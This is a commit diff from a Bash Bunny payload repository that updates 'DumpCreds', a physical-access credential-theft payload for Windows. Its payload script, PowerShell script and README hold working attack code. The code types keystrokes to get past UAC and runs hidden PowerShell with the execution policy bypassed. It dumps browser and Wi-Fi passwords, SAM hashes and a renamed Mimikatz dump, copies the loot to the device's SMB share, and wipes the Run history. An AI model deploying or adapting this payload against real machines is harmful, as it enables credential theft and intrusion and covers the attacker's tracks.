Updated DumpCreds for bunny fw v1.1 (#168)

* DumpCreds Version 2.1
- new payload.txt special for BashBunny FW 1.1
- minor changes in main.ps1
- insert some code for debugging

* Updadet becaus new fork sync

* new payload.txt special for BashBunny FW 1.1
+ minor changes in main.ps1
+ insert some code for debugging
pull/187/head
Baur 2017-04-16 08:03:02 +02:00 committed by Sebastian Kinne
parent 7534270a7a
commit 2d651c75f0
3 changed files with 176 additions and 128 deletions

View File

@ -1,22 +1,34 @@
# DumpCreds 2.0
# DumpCreds 2.1
* Author: QDBA
* Version: Version 2.0.2 Build 1003
* Target: Windows
* Version: Version 2.1.0 Build 1004
* Target: Windows 10
## Description
** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **
Dumps the usernames & plaintext passwords from
- Browsers (Crome, IE, FireFox)
- Wifi
- SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True)
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
* Browsers (Crome, IE, FireFox)
* Wifi
* SAM Hashes (only if AdminMode=True)
* Mimimk@tz Dump (only if AdminMode=True)
* Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
without
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
- Internet connection (becaus Firewall ContentFilter Blocks the download sites)
* Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
* Internet connection (becaus Firewall ContentFilter Blocks the download sites)
# Problems
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out.
If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)
# Debug
If you want some debug information, create a file with name "DEBUG" in the payload folder
you got the debug information in \loot\DumpCred_2.1\log.txt Folder
## Configuration
@ -24,11 +36,6 @@ None needed.
## Requirements
Impacket must be installed.
Install it from tools_installer payload
https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer
## Download
@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred
## Install
Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory.
1. Put Bash Bunny in arming mode
2. Coppy All Folders into the root of Bunny Flash Drive
Mandatory
* payloads/library/DumpCreds_2.1 --> the payload Files
* payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
* tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed)
Not neccessary
* docs --> this doc file
* languages --> languauge files for DUCKY_LANG
3. eject Bash Bunny safely!!
4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )
5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
6. eject Bash Bunny safely
7. move switch in right position
8. plugin Bash Bunny and have fun....! :-)
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White | Give drivers some time for installation |
| Red Blink Fast | Impacket not found |
| Red Blink Slow | Target did not acquire IP address |
| Amber Blink Fast | Initialization |
| Amber | HID Stage |
| Purple Blink Fast | Wait for IP coming up |
| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) |
| Purple / Amber | Powershell scripts running |
| RED | Error in Powershell Scripts |
| ----------------------- | -------------------------------------------- |
| Magenta Solid | Setup |
| Red slow blink | Impacket not found |
| Red fast blink | Target did not acquire IP address |
| Yellow single blink | Initialization |
| Yellow double blink | HID Stage |
| Yellow triple blink | Wait for IP coming up |
| Yellow quad blink | Wait for Handshake (SMBServer Coming up) |
| Yellow very fast blink | Powershell scripts running |
| White fast blink | Cleanup, copy Files to <root>/loot |
| Green | Finished |
| ------------------ | -------------------------------------------- |
| ----------------------- | -------------------------------------------- |
## Discussion
@ -67,13 +96,7 @@ to...... 
https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
## Changelog
## ToDo
- paralellize Creds gathering with PS -- check
- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target.
(Not very useful at ths time because I'm still Admin on Computer)
- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future)
- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check
(There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt)
- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain
- Complete new payload.txt code for BashBunny 1.1
- Added a lot of debug cod into the payload

View File

@ -1,7 +1,7 @@

<#
.SYNOPSIS
DumpCred 2.0
DumpCred 2.1
.DESCRIPTION
Dumps all Creds from a PC
.PARAMETER <paramName>
@ -10,8 +10,8 @@
DumpCred
#>
$_Version = "2.0.2"
$_BUILD = "1003"
$_Version = "2.1.0"
$_BUILD = "1004"
# Share on bashbunny
$SHARE="\\172.16.64.1\e"
@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE
Stop-Job *
Remove-Job *
# Start all Jobs as background jobs
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null
if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null
}
Write-host "... Wait for end of jobs"
# Wait for all jobs
Get-Job | Wait-Job | Out-Null
Get-Job | Wait-Job
Write-host "... Receiving results"
# Receive all results
Get-Job | Receive-Job | Out-File -Append $TMPFILE
#Move TMP File to Bunny
Write-host "Moving file to bunny"
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
# Cleanup
# Remove Run History
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
Write-host "... Rename CON_OK to CON_EOF"
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
# Kill cmd.exe
Write-host "... Kill cmds"
# Kill cmde.exe
Stop-Process -name cmd -ErrorAction SilentlyContinue
Write-host "... Remove all Jobs"
# Remove all Jobs from Joblist
Remove-Job *

View File

@ -1,79 +1,84 @@
#!/bin/bash
#
# Title: DumpCreds 2.0
# Title: DumpCreds 2.1
# Author: QDBA
# Version: 2.0.2
# Build: 1001
# Version: 2.1.0
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 7 + 10 (Powershell)
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# White................Wait for driver installation
# Red Blink Fast.......Impacket not found
# Red Blink Slow.......Target did not acquire IP address
# Amber Blink Fast.....Initialization
# Amber................HID Stage
# Purple Blink Fast....Wait for IP coming up
# Purple Blink Slow....Wait for Handshake (SMB Server Coming up)
# Purple / Amber ......Powershell scripts running
# RED..................Error in Powershell scripts
# Green................Finished
#
# OPTIONS
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
###### Lets Start ####
LED SETUP
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot
mkdir -p $LOOTDIR >/dev/null
# Initialization
LED R G 100
# Check for impacket. If not found, blink fast red.
if [ ! -f pentest/impacket/examples/smbserver.py ]; then
LED R 100
exit 1
# if the file DEBUG in payload folder exist, enter debug mode
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
DEBUG=0
fi
mkdir -p $LOOTDIR
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B
logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID
Q SET_LANGUAGE DE
export DUCKY_LANG=de
# Give some time for driver installation
Q DELAY 25000
Q DELAY 5000
LED R G 100
# Launch initial cmd
Q GUI r
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
# Launch powershell as admin (red window)
Q DELAY 1000
Q STRING cmd /k mode con lines=1 cols=180
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
Q ENTER
# Launch powershell as admin and deletes Run history
#Q GUI r
Q DELAY 1000
#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs"
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs"
Q DELAY 500
Q ENTER
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
@ -90,59 +95,74 @@ Q ALT n
Q DELAY 500
Q ENTER
LED R G
LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000
Q ENTER
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED R B 1
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
/pentest/impacket/examples/smbserver.py e $SWITCHDIR &
/tools/impacket/examples/smbserver.py e $SWITCHDIR &
# Give target a chance to start exfiltration
sleep 2
# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk
GET TARGET_IP
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED R 1000
exit 1
LED FAIL2
logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
LED R B 1000
LED STAGE4
# Handshake Bunny and Computer
while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1
done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
LED R B
LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready
while ! [ -f $SWITCHDIR/CON_EOF ]; do
LED R B
sleep 1
LED R G
sleep 1
if [ -f $SWITCHDIR/CON_ERR ]; then
rm $SWITCHDIR/CON_ERR
LED R
exit 2
fi
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 2
done
rm $SWITCHDIR/CON_EOF
sync; sleep 1; sync
LED G
LED CLEANUP
# Cleanup
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
# realy the end....
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH